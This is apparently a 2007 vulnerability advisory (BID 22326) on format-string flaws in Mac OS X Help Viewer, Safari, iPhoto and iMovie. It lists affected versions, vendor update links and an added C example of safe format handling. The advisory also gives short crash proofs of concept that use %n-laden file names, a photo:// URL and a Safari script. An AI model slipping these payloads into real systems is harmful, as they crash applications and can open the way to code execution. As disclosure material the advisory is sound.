Apple Mac OS X Multiple Products Format String Vulnerabilities
BID:22326
Info
| Bugtraq ID: | 22326 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-0646, CVE-2007-0644, CVE-2007-0645, CVE-2007-0647 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2007 12:00AM |
| Updated: | Jul 06 2016 02:40PM |
| Credit: | Discovered by LMH and KF. |
| Vulnerable: | Apple Safari 2.0.4, Apple Mac OS X Server 10.4.10, Apple Mac OS X Server 10.4.9, Apple Mac OS X Server 10.4.8, Apple Mac OS X Server 10.4.7, Apple Mac OS X Server 10.4.6, Apple Mac OS X Server 10.4.5, Apple Mac OS X Server 10.4.4, Apple Mac OS X Server 10.4.3, Apple Mac OS X Server 10.4.2, Apple Mac OS X Server 10.4.1, Apple Mac OS X Server 10.4, Apple Mac OS X Server 10.3.9, Apple Mac OS X 10.4.10, Apple Mac OS X 10.4.9, Apple Mac OS X 10.4.8, Apple Mac OS X 10.4.7, Apple Mac OS X 10.4.6, Apple Mac OS X 10.4.5, Apple Mac OS X 10.4.4, Apple Mac OS X 10.4.3, Apple Mac OS X 10.4.2, Apple Mac OS X 10.4.1, Apple Mac OS X 10.4, Apple Mac OS X 10.3.9, Apple iPhoto 6.0.5 (316), Apple iMovie HD 6.0.3, Apple Help Viewer 3.0 |
| Not Vulnerable: | Apple Mac OS X Server 10.4.11, Apple Mac OS X 10.4.11 |
Discussion
Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie.
Exploiting these issues can allow attacker-supplied data to be written to arbitrary memory locations, which can facilitate the execution of arbitrary machine code with the privileges of a targeted application. Failed exploit attempts will likely crash the application.
Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported affected; other versions may be vulnerable as well.
Exploit / POC
Reports indicate that this issue is being exploited in the wild.
Proofs of concept that trigger crashes are available:
iMovie:
touch %n%n%n%n%n%n%n%n%n%n%n.imovieproj
open %n%n%n%n%n%n%n%n%n%n%n.imovieproj
Help Viewer:
touch %n%n%n%n%n%n%n%n%n%n%n.help
open %n%n%n%n%n%n%n%n%n%n%n.help
iPhoto:
open 'photo://%25n%25n%25n%25n%25n%25n'
Safari:
<script>
window.console.log('%n%n%nOh it takes a montage%n%n%n')
</script>
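Added example, not part of the original advisory and not Apple's code: the string-handling pattern behind this bug class next to its hardened form, plus a check that counts format directives in untrusted input. The function names `label_safe`, `percent_decode` and `count_directives` are hypothetical, and the sample string in `main` is constructed in the shape of the proofs of concept above.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable (comment only): untrusted text IS the format, so "%n" stores to memory:
 *     snprintf(out, n, untrusted);
 * Hardened: the format is a constant and untrusted text is passed only as data. */
int label_safe(char *out, size_t n, const char *untrusted) {
    return snprintf(out, n, "Opening \"%s\"", untrusted);
}

/* Decode %XX escapes the way a URL handler would; dst needs strlen(src)+1. */
void percent_decode(char *dst, const char *src) {
    while (*src) {
        if (src[0] == '%' && isxdigit((unsigned char)src[1]) &&
            isxdigit((unsigned char)src[2])) {
            char hex[3] = { src[1], src[2], '\0' };
            *dst++ = (char)strtol(hex, NULL, 16);
            src += 3;
        } else {
            *dst++ = *src++;
        }
    }
    *dst = '\0';
}

/* Count printf directives in s ("%%" is literal); *writes = how many are %n. */
int count_directives(const char *s, int *writes) {
    int total = 0;
    *writes = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (*++s == '%') continue;
        while (*s && strchr("-+ #0123456789.*hlLqjzt$", *s)) s++;
        if (!*s) break;
        total++;
        if (*s == 'n') (*writes)++;
    }
    return total;
}

int main(void) {
    char dec[64], label[96];
    int w;
    percent_decode(dec, "photo://%25n%25n");   /* constructed sample URL */
    label_safe(label, sizeof label, dec);
    printf("%d directives in %s; safe label: %s\n", count_directives(dec, &w), dec, label);
    return 0;
}
```

The directive count is useful for triage and logging of suspicious file names or URLs; the fix itself is the constant format string in `label_safe`, which emits the input verbatim no matter what it contains.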
Solution / Fix
Solution:
The vendor has released Apple Security Update 2007-004 and fixes to address some of these issues. Please see the references for details.
UPDATE: The vendor released Apple Security Update 2007-008 and fixes to address some of these issues. Please see the referenced advisory for more information.
Apple Mac OS X 10.3.9
- Apple Security Update 2007-004 (10.3.9 Server)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=13655&cat= 1&platform=osx&method=sa/SecUpdSrvr2007-004Pan.dmg
- Apple Security Update 2007-004 (10.3.9 Client)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=13657&cat= 1&platform=osx&method=sa/SecUpd2007-004Pan.dmg
Apple Mac OS X 10.4.1
- Apple Mac OS X 10.4.11 Combo Update (Intel)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg
- Apple Mac OS X 10.4.11 Combo Update (PPC)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg
Apple Mac OS X 10.4.10
- Apple Mac OS X 10.4.11 Combo Update (Intel)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg
- Apple Mac OS X 10.4.11 Combo Update (PPC)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg
Apple Mac OS X 10.4.2
- Apple Mac OS X 10.4.11 Combo Update (Intel)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg
- Apple Mac OS X 10.4.11 Combo Update (PPC)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg
Apple Mac OS X 10.4.3
- Apple Mac OS X 10.4.11 Combo Update (Intel)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg
- Apple Mac OS X 10.4.11 Combo Update (PPC)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg
Apple Mac OS X 10.4.4
- Apple Mac OS X 10.4.11 Combo Update (Intel)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg
- Apple Mac OS X 10.4.11 Combo Update (PPC)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg
Apple Mac OS X 10.4.5
- Apple Mac OS X 10.4.11 Combo Update (Intel)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg
- Apple Mac OS X 10.4.11 Combo Update (PPC)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg
Apple Mac OS X 10.4.6
- Apple Mac OS X 10.4.11 Combo Update (Intel)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg
- Apple Mac OS X 10.4.11 Combo Update (PPC)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg
Apple Mac OS X 10.4.7
- Apple Mac OS X 10.4.11 Combo Update (Intel)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg
- Apple Mac OS X 10.4.11 Combo Update (PPC)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg
Apple Mac OS X 10.4.8
- Apple Mac OS X 10.4.11 Combo Update (Intel)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg
- Apple Mac OS X 10.4.11 Combo Update (PPC)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg
Apple Mac OS X Server 10.4.9
- Apple Security Update 2007-004 (Universal)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=13659&cat= 1&platform=osx&method=sa/SecUpd2007-004Univ.dmg
Apple Mac OS X 10.4.9
- Apple Mac OS X 10.4.11 Combo Update (Intel)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16036&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11Intel.dmg
- Apple Mac OS X 10.4.11 Combo Update (PPC)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16051&cat= 1&platform=osx&method=sa/MacOSXUpdCombo10.4.11PPC.dmg
- Apple Security Update 2007-004 (Universal)
  http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=13659&cat= 1&platform=osx&method=sa/SecUpd2007-004Univ.dmg
References
References:
- Chinese Weekend Compromise (Trend Micro)
- Cisco TelePresence Video Communication Server (VCS) Homepage (Cisco)
- JS_IFRAME.AD (Trend Micro)
- MOAB-30-01-2007: Multiple Apple Software Format String Vulnerabilities (LMH)
- APPLE-SA-2007-04-19 Security Update 2007-004 (Apple)